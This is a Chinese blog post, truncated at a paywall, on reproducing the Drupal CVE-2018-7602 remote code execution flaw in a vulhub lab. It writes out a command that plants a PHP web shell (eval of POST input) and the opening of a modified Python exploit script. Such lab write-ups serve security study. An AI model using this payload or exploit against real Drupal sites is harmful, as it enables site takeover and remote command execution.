Drupal 远程代码执行漏洞复现(CVE-2018-7602)

最新推荐文章于 2024-06-22 09:52:18 发布
最新推荐文章于 2024-06-22 09:52:18 发布
阅读量932 收藏
点赞数 2
文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/126217466
版权
本文详细介绍了如何复现Drupal的CVE-2018-7602远程代码执行漏洞,包括环境搭建、创建管理员角色以及利用POC反弹shell的步骤,并解析了漏洞的原理,涉及到URL编码技巧来绕过过滤机制。
摘要由CSDN通过智能技术生成

0x01 环境搭建

建立vulhub/drupal/CVE-2018-7602/环境

0x02 创建角色

给该网页创建一个网站管理员角色

在这里插入图片描述
登录初始管理员,授予权限给新建角色

在这里插入图片描述

设置完毕并保存后该新建的管理员角色就已激活

0x03 反弹shell连接

使用以下poc.py,与官网不同的是强制定义命令为 echo '<?php eval($_POST["cmd"]);echo "get shell";?>' > shell.php,因为如果使用原poc执行语句python3 poc.py -c "echo '<?php eval($_POST["cmd"]);echo "get shell";?>' > shell.php" drupal drupal http://靶机IP:8081/会导致输入错误等等原因,所以进行了一点修改

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
                    ''')

  parser.add_argument("user", help="Username")
  parser.add_argument("password", help="Password")
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-x", "--proxy", default=
最低0.47元/天 解锁文章
Tauil
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 4655
CVE-2018-7600漏洞学习与复现
drupal漏洞复现
qq_45230030的博客
01-04 974
drupal cms 漏洞复现
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
最新发布
gitblog_00043的博客
06-22 434
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 项目地址:https://gitcode.com/pimps/CVE-2018-7600 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专...
CVE-2018-7602 Drupal 远程代码执行漏洞复现
yzl_007的博客
08-09 1038
CVE-2018-7602 Drupal 远程代码执行漏洞复现 https://blog.51cto.com/u_14259144/2421816 漏洞描述 DrupalDrupal社区的一套使用PHP语言开发的开源内容管理系统。 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 环境搭建 同样的vulhub镜像搭建,这里不再演示 搭建完成如下 登陆部分漏洞,利用poc命令执行
Drupal远程代码执行漏洞CVE-2018-7602
weixin_46411728的博客
08-24 1439
CVE-2018-7602
Drupal漏洞复现CVE-2019-6341
weixin_59086772的博客
12-30 2254
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
CVE-2018-7600 | Drupal 8.5.x < 8.5.1 / 8.4.x < 8.4.6 / 8.x < 8.3.9 / 7.x? < 7.58 / < 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < ...
CVE-2018-7600
05-14
CVE-2018-7600-master CVE-2018-7600-master CVE-2018-7600-master在我的文章有复现欢迎交流
exploit-CVE-2016-10033:PHPMailer <5.2.18远程执行代码漏洞和易受攻击的容器
02-01
还有很多PHPMailer 5.2.18之前的版本存在一个漏洞,该漏洞可能导致远程代码执行(RCE)。 如果未设置Sender属性,则PHPMailer的isMail传输中的mailSend函数可能会允许远程攻击者将额外的参数传递给mail命令,从而...
drupal-code-generator:Drupal代码生成器
01-30
Drupal代码生成器 Drupal的命令行代码生成器。安装下载代码生成器的最新。 使文件可执行。 将其移动到PATH一部分中。 还支持使用Composer安装。升级只需重复安装命令。用法# Display navigation.dcg# Call generator...
wp_drupal_timing_attack:用于利用 CVE-2014-9016 和 CVE-2014-9034 的 Python 脚本
07-04
标题中的“wp_drupal_timing_attack”是一个特定的项目或工具名称,显然与WordPress和Drupal安全漏洞利用有关。这个工具是一个Python脚本,设计用于利用2014年被发现的两个安全漏洞,即CVE-2014-9016和CVE-2014-...
Drupal 7 Explained Your Step-by-Step Guide epub
05-10
Drupal 7 Explained Your Step-by-Step Guide 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
Drupal 远程代码执行漏洞CVE-2018-7602漏洞复现
ADummy的博客
02-23 1067
Drupal 远程代码执行漏洞CVE-2018-7602) by ADummy 0x00利用路线 ​ poc直接打 0x01漏洞介绍 ​ 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 影响版本 Drupal < 7.58 Drupal < 8.3.9 Drupal < 8.4.6 Drupal < 8.5.1 0x02漏洞复现 exp地址:pi
Drupal远程代码执行漏洞CVE-2019-6339)
weixin_46411728的博客
08-25 2634
Drupal 远程代码执行漏洞CVE-2019-6339)
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2018-7602
qq_51577576的博客
02-19 951
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2018-7602Drupal由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞执行恶意代码,导致网站被完全控制。CVE-2018-7602这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的。
复现DC-1靶机:Drupal CMS漏洞挖掘与利用
"复现DC-1靶机的攻防演练过程,涉及网络扫描、漏洞检测、Drupal CMS的利用以及数据库操作。" 在网络安全领域,靶机是一种模拟真实系统环境的工具,用于安全研究人员和渗透测试人员进行实战演练和技能提升。本资源是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值